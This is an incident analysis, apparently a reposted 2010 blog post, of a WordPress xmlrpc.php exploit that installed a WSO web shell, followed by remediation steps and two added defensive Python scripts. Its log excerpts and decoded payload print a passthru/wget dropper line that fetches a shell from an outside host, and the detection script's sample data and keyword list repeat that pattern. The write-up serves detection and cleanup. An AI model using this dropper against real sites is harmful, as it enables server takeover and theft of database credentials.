WordPress xmlrpc.php flaw exploited to install a WSO 2.1 Web Shell by ORb

Source: Internet
Author: User
Tags hosting wordpress database


The excerpt from the Apache access log below shows how the Russian attacker first registers an account on the vulnerable WordPress site. It is a good idea to disable open user registration on your WordPress installation, although you may need to keep it enabled if you run a forum on the same WordPress site.

95.52.64.98 - - [30/Oct/2010:17:10:49 +0200] "POST /wp-login.php?action=register HTTP/1.1" 302 "http://www........org/wp-login.php?action=register" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

95.52.64.98 - - [30/Oct/2010:17:11:17 +0200] "POST /wp-login.php HTTP/1.0" 302 - "http://www.......org/wp-login.php" "Opera"

After logging in, the cracker installs the remote shell, fetched from another compromised website, by abusing a flaw in the xmlrpc.php file:

95.52.64.98 - - [30/Oct/2010:17:11:20 +0200] "POST /xmlrpc.php HTTP/1.0" 4366 "chjpbnqgjzxtywdpy19zzw9fdg9vbho+jztwyxnzdghydsgid2dldcbodhrwoi8vd3d3lmvkdhv0b3jpywwubmv0l3dfb2xklnr4ddsgbxygd19vbgqudhh0ignhy2hllnbocdsgbhmglwfsoybwd2qikttlegl0ow==" "Opera"

95.52.64.98 - - [30/Oct/2010:17:11:22 +0200] "POST /wp-admin//options-permalink.php HTTP/1.0" 9491 "http://www.......org/wp-admin//options-permalink.php" "Opera"

You can see that xmlrpc.php is being fed Base64-encoded input. (The copy of the string reproduced here has lost its letter case, so it will not decode as printed.) Decoded from the original log, it reads something like this:

print '<magic_seo_toolz>';passthru("wget http://www.edtutorial.net/w_old.txt; mv w_old.txt cache.php; ls -al; pwd"); exit;

This PHP code fetches the remotely hosted file w_old.txt with wget and renames it to cache.php on the server.

cache.php is the web shell itself; you can open it yourself if the cracker has not set a password on it. The main problem with this shell is that it can read wp-config.php as plain text, so your database username and password are compromised: change that password once you have fixed the issue!

95.52.64.98 - - [30/Oct/2010:17:12:14 +0200] "POST /cache.php HTTP/1.1" 4510 "/cache.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
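The log analysis walked through above, turned into a small detection script. This is an added example, not part of the original post: it parses Apache combined-format lines, flags POSTs to xmlrpc.php whose referer or user-agent field is a Base64 blob that decodes to shell commands, pulls out the file name the payload renames into place, and then lists later requests from the same IP to that file. The log lines, IP addresses, hostname and the attacker.example URL are constructed placeholders.

```python
import base64
import re

# Constructed sample log lines in Apache combined format (not the original post's log;
# the IPs, hostname and URL are documentation placeholders). The third line carries a
# base64 blob in the referer field, the way the post's own xmlrpc.php request did.
PAYLOAD = ("print '<magic_seo_toolz>';"
           "passthru(\"wget http://attacker.example/w_old.txt; mv w_old.txt cache.php; ls -al; pwd\");"
           " exit;")
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()

SAMPLE_LOG = [
    '203.0.113.5 - - [30/Oct/2010:17:10:49 +0200] "POST /wp-login.php?action=register HTTP/1.1" 302 - "http://www.example.org/wp-login.php?action=register" "Mozilla/4.0"',
    '203.0.113.5 - - [30/Oct/2010:17:11:17 +0200] "POST /wp-login.php HTTP/1.0" 302 - "http://www.example.org/wp-login.php" "Opera"',
    '203.0.113.5 - - [30/Oct/2010:17:11:20 +0200] "POST /xmlrpc.php HTTP/1.0" 200 4366 "' + ENCODED + '" "Opera"',
    '203.0.113.5 - - [30/Oct/2010:17:11:22 +0200] "POST /wp-admin/options-permalink.php HTTP/1.0" 200 9491 "http://www.example.org/wp-admin/options-permalink.php" "Opera"',
    '203.0.113.5 - - [30/Oct/2010:17:12:14 +0200] "POST /cache.php HTTP/1.1" 200 4510 "/cache.php" "Mozilla/4.0"',
    '198.51.100.7 - - [30/Oct/2010:18:00:00 +0200] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
B64_RE = re.compile(r'^[A-Za-z0-9+/]{16,}={0,2}$')
# Calls a PHP dropper or web shell almost always needs; legitimate XML-RPC traffic
# never carries them base64-encoded in the referer or user-agent.
SHELL_INDICATORS = ('passthru', 'system(', 'exec(', 'shell_exec', 'eval(',
                    'wget ', 'curl ', 'base64_decode')
DROP_RE = re.compile(r'\bmv\s+\S+\s+([\w./-]+\.php)')


def try_decode(token):
    """Return the UTF-8 text behind a base64 token, or None if it is not valid base64/text."""
    try:
        return base64.b64decode(token, validate=True).decode('utf-8')
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def scan_log(lines):
    """Flag POSTs to xmlrpc.php whose referer or user-agent is base64 hiding shell commands."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m['method'] != 'POST' or not m['path'].startswith('/xmlrpc.php'):
            continue
        for field in ('referer', 'ua'):
            token = m[field].strip()
            decoded = try_decode(token) if B64_RE.match(token) else None
            if decoded is None:
                continue
            hits = [k for k in SHELL_INDICATORS if k in decoded]
            if hits:
                findings.append({'ip': m['ip'], 'ts': m['ts'], 'field': field,
                                 'indicators': hits, 'decoded': decoded})
    return findings


def dropped_files(decoded):
    """File names a decoded payload renames into place (the 'mv ... cache.php' step)."""
    return DROP_RE.findall(decoded)


def requests_to(lines, ip, names):
    """Later requests from the same IP to the dropped files: the shell being used."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m['ip'] == ip and m['path'].lstrip('/').split('?')[0] in names:
            out.append((m['ts'], m['method'], m['path']))
    return out


def investigate(lines):
    """Tie the three steps together into one report per injection."""
    report = []
    for f in scan_log(lines):
        names = dropped_files(f['decoded'])
        report.append({'ip': f['ip'], 'injected_at': f['ts'], 'dropped': names,
                       'shell_requests': requests_to(lines, f['ip'], names)})
    return report


if __name__ == '__main__':
    for entry in investigate(SAMPLE_LOG):
        print(entry)
```

Run against a real access log, the same report tells you which IP injected the payload, what file it dropped, and every later hit on that file, which is exactly the sequence the post reconstructs by hand. Because extraction or log rotation can mangle the Base64 (as happened to the copy in this post), anything that fails to decode is skipped rather than treated as a finding.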

How was this possible? First, the webroot directory had the wrong permissions (777), and second, the WordPress installation was a year old and had known exploitable issues in XML-RPC.

How to fix this once your site has been compromised?

  1. The permissions of the webroot must be changed to 755.
  2. Then the WordPress installation must be deleted and a fresh install copied to the server. Be sure to retain a copy of the web shell for your hosting security officer.
  3. After this, the password of the WordPress database user has to be changed.
  4. The WordPress database must be restored from a backup so that any spam links injected since the compromise are removed.
  5. The WordPress database must be upgraded, which the admin can do via wp-admin.
  6. Last but not least, the whole GKFX server had to be scanned for any additional shells owned by the user www-data, httpd or apache, depending on the operating system. So if you are hosted on a GKFX hosting platform you must inform your security officer that your WordPress installation was compromised so that he/she can perform a security check of the server.
  7. Backup, backup, backup! Be sure to always keep multiple backups of your WordPress database on your own PC. This exploit was mostly abused by blackhat SEO companies to spamvertise their websites via your RSS feed, and having a "clean" backup would save you a lot of time.
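Steps 1 and 6 of the list above (reset the webroot permissions, then hunt for further shells and check whether wp-config.php is exposed) as a triage script. This is an added example, not the post's own tooling or a GKFX procedure. It builds a constructed throwaway webroot in a temporary directory, so everything it touches is example data; point the functions at a real webroot only after you have taken the copy of the shell the post tells you to keep.

```python
import os
import re
import stat
import tempfile

# Functions that WSO-style shells and PHP droppers rely on. WordPress core itself calls
# some of them, so matches are a review list for the security officer, not a verdict.
SUSPICIOUS_RE = re.compile(
    r'\b(passthru|shell_exec|system|exec|popen|eval|base64_decode)\s*\(', re.I)
SENSITIVE_FILES = {'wp-config.php': 0o640}   # must not be world-readable
DIR_MODE, FILE_MODE = 0o755, 0o644           # the post's step 1: webroot back to 755


def build_sample_webroot():
    """Constructed stand-in for a compromised webroot (example data, not a real site)."""
    root = tempfile.mkdtemp(prefix='webroot-')
    os.chmod(root, 0o777)                      # the misconfiguration the post describes
    for d, mode in (('wp-includes', 0o755), ('wp-content', 0o755),
                    ('wp-content/uploads', 0o777)):
        os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, d), mode)  # set explicitly so umask cannot interfere
    files = {
        'wp-config.php': "<?php define('DB_PASSWORD', 'constructed-secret'); ?>",
        'wp-includes/functions.php': "<?php function wp_constructed() { return 'ok'; } ?>",
        # dropper-like file: its only suspicious call is a harmless directory listing
        'cache.php': "<?php passthru('ls -al'); ?>",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(body)
        os.chmod(path, 0o644)
    return root


def world_writable_dirs(root):
    """Directories anyone on the box can write into (the 777 problem), relative to root."""
    return sorted(os.path.relpath(d, root) for d, _, _ in os.walk(root)
                  if os.stat(d).st_mode & stat.S_IWOTH)


def suspicious_php_files(root):
    """Map of PHP file -> sorted list of shell-style calls it contains, for manual review."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith('.php'):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                calls = sorted({m.group(1).lower() for m in SUSPICIOUS_RE.finditer(fh.read())})
            if calls:
                hits[os.path.relpath(path, root)] = calls
    return hits


def wp_config_world_readable(root):
    """True if wp-config.php (and so the DB password) is readable by every local user."""
    return bool(os.stat(os.path.join(root, 'wp-config.php')).st_mode & stat.S_IROTH)


def fix_permissions(root):
    """Clamp directories to 755, files to 644 and sensitive files tighter; return count changed."""
    changed = 0
    for dirpath, _, names in os.walk(root):
        targets = [(dirpath, DIR_MODE)] + [
            (os.path.join(dirpath, n), SENSITIVE_FILES.get(n, FILE_MODE)) for n in names]
        for path, want in targets:
            if stat.S_IMODE(os.stat(path).st_mode) != want:
                os.chmod(path, want)
                changed += 1
    return changed


if __name__ == '__main__':
    root = build_sample_webroot()
    print('world-writable:', world_writable_dirs(root))
    print('review these files:', suspicious_php_files(root))
    print('wp-config.php world-readable:', wp_config_world_readable(root))
    print('permissions changed:', fix_permissions(root))
    print('world-writable after fix:', world_writable_dirs(root))
```

The file scan is deliberately noisy: a match means "look at this file", and the post's advice to reinstall WordPress from a clean copy still stands, because a shell can be hidden in ways a keyword search will not catch. The permission reset does not cover file ownership, so the search for files owned by www-data, httpd or apache from step 6 remains a separate check on the real server.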
